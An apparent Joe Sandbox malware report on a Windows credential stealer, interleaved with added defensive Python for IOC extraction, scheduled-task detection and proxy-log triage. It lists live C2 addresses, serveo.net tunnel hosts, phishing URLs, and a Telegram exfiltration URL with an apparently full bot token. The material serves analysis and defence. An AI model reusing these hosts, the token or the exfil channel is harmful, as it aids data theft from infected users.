                                                                                            https://185.217.98.121:443vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://ac.ecosia.org/autocomplete?q=vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://116.202.101.219:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              https://api.televkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://206.189.109.146:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              http://127.0.0.1:18772/handleOpenWSR?r=vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://support.mozilla.orgvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7577000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE757F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zipvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72%vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://crl.vvkefq4cv.oil.exe, 0000000B.00000002.4115442750.000001B8A9D61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
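The URL strings above are a mixed bag: library and documentation strings that came with the .NET and PowerShell runtime (schemas.xmlsoap.org, support.mozilla.org, contoso.com), local listeners on 127.0.0.1, two serveo.net reverse-tunnel hostnames that the dropped ssh.exe connects to, a Telegram Bot API call with the full bot token in the URL path, a percent-encoded report path on 185.119.118.59:8080, and a long list of bare IP:port strings with mostly "unknown" reputation. The Python below is an added example for triaging such a list; it is not part of the Joe Sandbox report and not the stealer's code. The strings in SAMPLE_URLS are copied from the table; the category names, the decision to treat every public IP:port as a C2 candidate rather than confirmed C2, and the token redaction format are my own choices.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# URL strings copied verbatim from the memory-string table above (a subset).
SAMPLE_URLS = [
    "http://45.61.136.52:80",
    "https://44.228.161.50:443",
    "http://185.119.118.59:8080/hkLYW_user",
    "http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72%",
    "http://193.142.58.127:80Pk",  # junk bytes follow the port, exactly as dumped
    "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage",
    "https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net/",
    "https://e483612b93e055308d0c85f365c474ee.serveo.net",
    "http://127.0.0.1:6787/ing=no",
    "http://schemas.xmlsoap.org/wsdl/",
    "https://support.mozilla.org",
]

TELEGRAM_BOT_RE = re.compile(r"api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)")


def classify(url):
    """Parse one URL string and label it by what its host is.

    kind is one of: loopback, private, raw_ip, tunnel, telegram, domain.
    Strings lifted from memory are often truncated or carry trailing junk,
    so a port that does not parse is reported as None instead of raising.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    try:
        port = parts.port
    except ValueError:  # e.g. ":80Pk" where junk follows the port
        port = None
    try:
        ip = ipaddress.ip_address(host)
        if ip.is_loopback:
            kind = "loopback"
        elif ip.is_private:
            kind = "private"
        else:
            kind = "raw_ip"
    except ValueError:  # not an IP literal, so look at the name
        if host.endswith(".serveo.net"):
            kind = "tunnel"  # SSH reverse-tunnel front; the real listener is hidden
        elif host == "api.telegram.org":
            kind = "telegram"
        else:
            kind = "domain"
    decoded = unquote(parts.path)  # a lone trailing '%' is left as-is
    return {"url": url, "host": host, "port": port, "kind": kind, "path": decoded}


def redact_telegram_token(url):
    """Return 'botid:AAF6***...' for a Bot API URL, or None if there is none.

    The numeric bot id is not secret; the string after the colon is, so only
    its first four characters survive. The redaction format is mine, not
    something the report defines.
    """
    m = TELEGRAM_BOT_RE.search(url)
    if not m:
        return None
    bot_id, secret = m.group(1), m.group(2)
    return f"{bot_id}:{secret[:4]}{'*' * (len(secret) - 4)}"


def extract_iocs(urls):
    """Group URL strings into indicator lists a responder can act on."""
    c2, tunnels, bots, decoded = set(), set(), [], {}
    for url in urls:
        rec = classify(url)
        if rec["kind"] == "raw_ip":
            c2.add(rec["host"] if rec["port"] is None else f"{rec['host']}:{rec['port']}")
        elif rec["kind"] == "tunnel":
            tunnels.add(rec["host"])
        elif rec["kind"] == "telegram":
            token = redact_telegram_token(url)
            if token:
                bots.append(token)
        if rec["path"] != urlsplit(url).path:  # only record paths that were encoded
            decoded[url] = rec["path"]
    return {
        "c2_candidates": sorted(c2),
        "tunnel_hosts": sorted(tunnels),
        "telegram_bots": bots,
        "decoded_paths": decoded,
    }


if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE_URLS).items():
        print(key, value)
```

Running it over the sample shows why the percent-encoded entry deserves a second look: it decodes to the same `hkLYW_` prefix as the plain `/hkLYW_user` path on the same host, which ties both strings to one reporting endpoint. Loopback URLs are deliberately kept out of the indicator lists because they describe the local tunnel end, not infrastructure you can block.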
IP | Domain | Country | ASN | ASN Name | Malicious
82.147.85.194 | unknown | Russian Federation | 31112 | SIBTEL-ASRU | false
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
138.68.79.95 | serveo.net | United States | 14061 | DIGITALOCEAN-ASNUS | false
185.119.118.59 | unknown | Austria | 44133 | IPAX-ASAT | false
                                                                                                    IP
                                                                                                    127.0.0.1
                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                    Analysis ID:1390172
                                                                                                    Start date and time:2024-02-10 16:16:06 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 11m 29s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:47
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:jqOHOuPMJP.exe
                                                                                                    renamed because original name is a hash value
                                                                                                    Original Sample Name:7e9a93c69aecfc2bbda9470fbd4556db.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@66/19@3/6
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 87.5%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 98%
                                                                                                    • Number of executed functions: 153
                                                                                                    • Number of non-executed functions: 17
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 20.189.173.22
                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Execution Graph export aborted for target vkefq4cv.oil.exe, PID 7316 because it is empty
                                                                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
15:17:16 | Task Scheduler | Run new task: vkefq4cv.oil path: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
16:16:59 | API Interceptor | 2x Sleep call for process: jqOHOuPMJP.exe modified
16:16:59 | API Interceptor | 15x Sleep call for process: powershell.exe modified
16:17:17 | API Interceptor | 4964965x Sleep call for process: vkefq4cv.oil.exe modified
16:17:35 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
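The timeline row above records the persistence mechanism: a scheduled task named vkefq4cv.oil whose action runs the dropped copy out of C:\Users\user\AppData\Local\RobloxSecurity\. The check a defender wants for that pattern is a rule over Security event 4698 ("A scheduled task was created") that flags any task whose Exec action lives in a user-writable directory. The following is an added example, not Joe Sandbox code: the two 4698 records are constructed in the XML shape Event Viewer shows (the first mirrors the task above, the second is a benign control), and the path policy in USER_WRITABLE is a hypothetical starting point to tune per environment.

```python
"""Flag scheduled tasks whose Exec action runs from a user-writable directory.

Added example for this report, not Joe Sandbox code. Events are constructed
Security 4698 records; the first mirrors the task in the timeline
(vkefq4cv.oil -> C:\\Users\\user\\AppData\\Local\\RobloxSecurity\\vkefq4cv.oil.exe).
"""
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVENT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Locations an unprivileged user can write to. Hypothetical policy: a task
# action rooted here is the pattern the timeline above shows.
USER_WRITABLE = re.compile(
    r"\\AppData\\(Local|Roaming)\\|\\Users\\Public\\|\\Temp\\", re.IGNORECASE
)


def task_xml(command, arguments=""):
    """Minimal Task Scheduler definition with a single Exec action."""
    return (
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        '<Actions Context="Author"><Exec>'
        f"<Command>{escape(command)}</Command>"
        f"<Arguments>{escape(arguments)}</Arguments>"
        "</Exec></Actions></Task>"
    )


def event_4698(task_name, user, task_content):
    """Constructed 4698 event; TaskContent carries the task XML escaped as text."""
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        "<System><EventID>4698</EventID></System><EventData>"
        f'<Data Name="SubjectUserName">{escape(user)}</Data>'
        f'<Data Name="TaskName">{escape(task_name)}</Data>'
        f'<Data Name="TaskContent">{escape(task_content)}</Data>'
        "</EventData></Event>"
    )


# Constructed sample log, not event data from the report.
SAMPLE_EVENTS = [
    event_4698(
        r"\vkefq4cv.oil", "user",
        task_xml(r"C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"),
    ),
    event_4698(
        r"\GoogleUpdateTaskMachineUA", "SYSTEM",
        task_xml(r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe",
                 "/ua /installsource scheduler"),
    ),
]


def parse_4698(event_xml):
    """Return (task_name, creating_user, exec_command) from one 4698 event."""
    root = ET.fromstring(event_xml)
    data = {d.get("Name"): (d.text or "") for d in root.iter(EVENT_NS + "Data")}
    task = ET.fromstring(data["TaskContent"])  # the embedded task definition
    command = task.findtext(f".//{TASK_NS}Exec/{TASK_NS}Command", default="")
    return data["TaskName"], data["SubjectUserName"], command


def suspicious_tasks(events):
    """Tasks whose Exec command sits under a user-writable path."""
    hits = []
    for event_xml in events:
        name, user, command = parse_4698(event_xml)
        if USER_WRITABLE.search(command):
            hits.append((name, user, command))
    return hits


if __name__ == "__main__":
    for name, user, command in suspicious_tasks(SAMPLE_EVENTS):
        print(f"ALERT task={name} created_by={user} runs={command}")
```

Event 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled, so confirm that before relying on this rule; the equivalent schtasks.exe command line also appears in process-creation telemetry (4688 or Sysmon 1) when command-line logging is on.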
Match | Associated Sample Name / URL | Detection | Threat Name | Context
82.147.85.194 | QHHuOVwGfL.exe | malicious | PureLog Stealer, zgRAT | 82.147.85.194/byte/@Guzman13371.txt
82.147.85.194 | 3NzQY1wS2B.exe | malicious | PureLog Stealer, RedLine | 82.147.85.194/byte/@michael_0G.txt
82.147.85.194 | 6101XOxMbY.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT | 82.147.85.194/byte/@Guzman13371.txt
82.147.85.194 | Sz8KLg559F.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT | 82.147.85.194/byte/@Guzman13371.txt
82.147.85.194 | C7e8AncaYu.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT | 82.147.85.194/byte/@WWtheCardeur_2475.txt
208.95.112.1 | 17075649093e1f08173f977f56d5a6074cf72a4a48f58106317565a0844aab156446d6e86e172.dat-decoded.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Dekont.exe | malicious | AgentTesla, PureLog Stealer, RedLine | ip-api.com/line/?fields=hosting
208.95.112.1 | Dekont.pdf.exe | malicious | AgentTesla, PureLog Stealer, RedLine | ip-api.com/line/?fields=hosting
208.95.112.1 | 1eО.vbs | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | DA-0986789009008.bat.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | something.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | cotización para nuevo pedido.xla.xlsx | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | 17074938086a37925e51090cde88bb9b9cab9c2809900b2e7c2a2e6b8d9f8e8d3d3ee8799e367.dat-decoded.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Nueva Orden de Compra 45035339504.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | ESTADO DE CUENTA DHL - 69502.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | 17075649093e1f08173f977f56d5a6074cf72a4a48f58106317565a0844aab156446d6e86e172.dat-decoded.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Dekont.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 208.95.112.1
ip-api.com | Dekont.pdf.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 208.95.112.1
ip-api.com | 1eО.vbs | malicious | AgentTesla | 208.95.112.1
ip-api.com | DA-0986789009008.bat.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | https://secosrl.com/.well-known/pki-validation/Auths/5155027697.html | malicious | HTMLPhisher | 38.91.107.240
ip-api.com | something.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | cotización para nuevo pedido.xla.xlsx | malicious | AgentTesla | 208.95.112.1
ip-api.com | 17074938086a37925e51090cde88bb9b9cab9c2809900b2e7c2a2e6b8d9f8e8d3d3ee8799e367.dat-decoded.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Nueva Orden de Compra 45035339504.exe | malicious | AgentTesla | 208.95.112.1
api.telegram.org | AlPDAGITIM FİYAT TEKLİF _PER 001 …scanneed 00101.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 149.154.167.220
api.telegram.org | SOMGAZ PO NO6200125011.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
api.telegram.org | DHL.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | 0O060gfMXL.exe | malicious | Keyzetsu Clipper, PureLog Stealer, zgRAT | 149.154.167.220
api.telegram.org | l9mYgXeAP6.exe | malicious | DCRat | 149.154.167.220
api.telegram.org | SecuriteInfo.com.FileRepMalware.13580.30909.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | BILL_OF_LADING_02062024_MAERSKLINE.JS | malicious | AgentTesla | 149.154.167.220
api.telegram.org | N4PSobGhBi.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | Ompdem.exe | malicious | PureLog Stealer, Snake Keylogger | 149.154.167.220
api.telegram.org | FG0987600008000.jar | malicious | AgentTesla | 149.154.167.220
serveo.net | https://b8013254eee96ef4659628582f5a50c4.serveo.net/login.html.php | malicious | Unknown | 138.68.79.95
serveo.net | Y3b5c7qTOT.exe | malicious | Gurcu Stealer | 138.68.79.95
serveo.net | http://c19004ed64b239568d3bcd24530de08b.serveo.net/login.html | malicious | Unknown | 138.68.79.95
serveo.net | http://7835dbdb3022446b51c31cd27fec818f.serveo.net/login.html | malicious | Unknown | 138.68.79.95
serveo.net | L7A5ai2xFC.exe | malicious | Gurcu Stealer | 138.68.79.95
serveo.net | oMGTwbRGSf.exe | malicious | Gurcu Stealer | 138.68.79.95
serveo.net | nbbv.exe | malicious | Nanocore | 159.89.214.31
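The IP and domain correlation tables above share a subtlety worth encoding in any detection built from them: api.telegram.org (149.154.167.220), ip-api.com (208.95.112.1) and serveo.net (138.68.79.95) are shared services that carry plenty of legitimate traffic, so a bare match on the host is only a lead, whereas the request paths the tables record (ip-api.com/line/?fields=hosting, 82.147.85.194/byte/@<name>.txt) pin down the stealer behaviour. The following triage script is an added example, not Joe Sandbox code: the proxy log lines are constructed in a simplified "timestamp client method url" format, and the Telegram Bot API path pattern (/bot<token>/sendDocument) is an assumption about how a Telegram-based exfil channel looks, not a path this report records.

```python
"""Triage proxy log lines against the network indicators in the tables above.

Added example for this report, not Joe Sandbox code. Log lines are constructed.
Verdicts: "alert" for a dedicated malware host or a host+path signature,
"review" for a bare hit on a shared service, "clean" otherwise.
"""
import re
from urllib.parse import urlsplit

# Host the tables tie only to malware samples: any request is an alert.
DEDICATED_HOSTS = {"82.147.85.194"}

# Shared services (domain -> IP from the tables): a hit alone only means review.
SHARED_SERVICES = {
    "api.telegram.org": "149.154.167.220",
    "ip-api.com": "208.95.112.1",
    "serveo.net": "138.68.79.95",
}

# (hosts, path+query pattern, label). Host and path together separate a stealer
# beacon from ordinary use of the same service.
PATH_SIGNATURES = [
    ({"ip-api.com", "208.95.112.1"}, re.compile(r"^/line/\?fields=hosting$"),
     "ip-api.com hosting check, same context as the AgentTesla samples above"),
    ({"api.telegram.org", "149.154.167.220"},
     re.compile(r"^/bot\d+:[\w-]+/send(Document|Message)$"),
     "Telegram Bot API upload/message (assumed exfil path, not from the report)"),
    ({"82.147.85.194"}, re.compile(r"^/byte/@[\w.-]+\.txt$"),
     "82.147.85.194 /byte/@<name>.txt fetch, context shared with PureLog/RedLine samples"),
]

# Constructed sample log, not traffic from the report's PCAP.
SAMPLE_LOG = """\
2024-02-10T15:17:30Z 10.0.0.15 GET http://ip-api.com/line/?fields=hosting
2024-02-10T15:17:31Z 10.0.0.15 POST https://api.telegram.org/bot123456789:AAExampleTokenNotReal_000000000000/sendDocument
2024-02-10T15:17:40Z 10.0.0.15 GET http://82.147.85.194/byte/@Guzman13371.txt
2024-02-10T15:18:02Z 10.0.0.22 GET https://api.telegram.org/bot123456789:AAExampleTokenNotReal_000000000000/getMe
2024-02-10T15:18:10Z 10.0.0.22 GET https://www.example.com/index.html
2024-02-10T15:18:15Z 10.0.0.31 GET https://abcd1234.serveo.net/login.html
"""


def matches_service(host, service):
    """True for the service itself or any subdomain (the serveo.net tunnels above are subdomains)."""
    return host == service or host.endswith("." + service)


def classify(url):
    """Return (verdict, reason) for one requested URL."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    target = parts.path + ("?" + parts.query if parts.query else "")
    for hosts, pattern, label in PATH_SIGNATURES:
        if host in hosts and pattern.search(target):
            return "alert", label
    if host in DEDICATED_HOSTS:
        return "alert", f"request to dedicated malware host {host}"
    for service, ip in SHARED_SERVICES.items():
        if matches_service(host, service):
            return "review", f"shared service {service} ({ip}): check path, volume and client"
    return "clean", ""


def triage(log_text):
    """Parse the constructed log format and classify every request."""
    results = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        timestamp, client, method, url = line.split(maxsplit=3)
        verdict, reason = classify(url)
        results.append({"time": timestamp, "client": client, "method": method,
                        "url": url, "verdict": verdict, "reason": reason})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        print(f"{r['verdict']:6} {r['client']:<10} {r['url']}  {r['reason']}")
```

The path-level signatures only fire where the proxy terminates TLS; with DNS or flow data alone, every Telegram or ip-api.com contact stays at "review", and blocking 149.154.167.220 outright would also cut legitimate Telegram clients, which is why the host-plus-path split matters more than the IP list.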
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | AlPDAGITIM FİYAT TEKLİF _PER 001 …scanneed 00101.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 149.154.167.220
TELEGRAMRU | SOMGAZ PO NO6200125011.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
TELEGRAMRU | DHL.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | 0O060gfMXL.exe | malicious | Keyzetsu Clipper, PureLog Stealer, zgRAT | 149.154.167.220
TELEGRAMRU | rR15ofOPl3.exe | malicious | LummaC, Amadey, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine | 149.154.167.99
TELEGRAMRU | l9mYgXeAP6.exe | malicious | DCRat | 149.154.167.220
TELEGRAMRU | https://2n8w.app.link/?~channel=Email&~feature=ConfirmationEmail--AtocETicket&~campaign=WebToApp&~tags=locale%3Den_GB&~tags=version%3D1&~tags=marketing_code%3DBSH3675&$android_url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.thetrainline%26hl%3Den-GB&$android_deepview=false&$android_passive_deepview=false&$ios_url=https%3A%2F%2Fitunes.apple.com%2FGB%2Fapp%2Fthetrainline%2Fid334235181&$ios_deepview=false&$ios_passive_deepview=false&$fallback_url=https://sedat.biz/dev/css/ksyidpguxq/YnJldHQuY2FydGVyQGFtZXJpc2JhbmsuY29t# | malicious | Unknown | 149.154.167.99
TELEGRAMRU | https://80rb.app.link/?~channel=Web--Direct&~feature=Cms&~campaign=AppBanner&~tags=locale%3Dfr_FR&~tags=version%3D1&~tags=target%3Dios&$ios_url=https%3A%2F%2Fitunes.apple.com%2FFR%2Fapp%2Fthetrainline%2Fid599502670&$ios_deepview=false&$ios_passive_deepview=false&$fallback_url=istanbulrehber%E3%80%82gen.tr/dev/css/tfcyyfxpck/YWxleC5ibGFuY29AdmFudGFnZXJpc2suY29t#%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojotap%3C/STRONG%3E%3C/FONT%3E%3CFONT%20id=%7Bdvojotap%7D%3E%3CSTRONG%3Edvojot | malicious | Unknown | 149.154.167.99
TELEGRAMRU | SecuriteInfo.com.FileRepMalware.13580.30909.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | BILL_OF_LADING_02062024_MAERSKLINE.JS | malicious | AgentTesla | 149.154.167.220
DIGITALOCEAN-ASNUS | https://newsheater.com/2024/02/08/worthington-steel-inc-ws-shares-rise-despite-market-challenges/ | malicious | Unknown | 157.245.253.204
DIGITALOCEAN-ASNUS | FW_ Town of Lake Hamilton_Spreadsheet.msg | malicious | HtmlDropper, HTMLPhisher | 159.89.102.253
DIGITALOCEAN-ASNUS | MNpiaf0SjJ.elf | malicious | Mirai | 104.248.249.107
DIGITALOCEAN-ASNUS | OriginalMessage.txt.msg | malicious | Unknown | 67.207.85.73
DIGITALOCEAN-ASNUS | nigga.sh | malicious | Mirai | 157.245.233.192
DIGITALOCEAN-ASNUS | https://track.trackminds.net/campaign/563210d7-bbd1-40f1-a8a1-5fe191294d15 | malicious | Unknown | 46.101.220.185
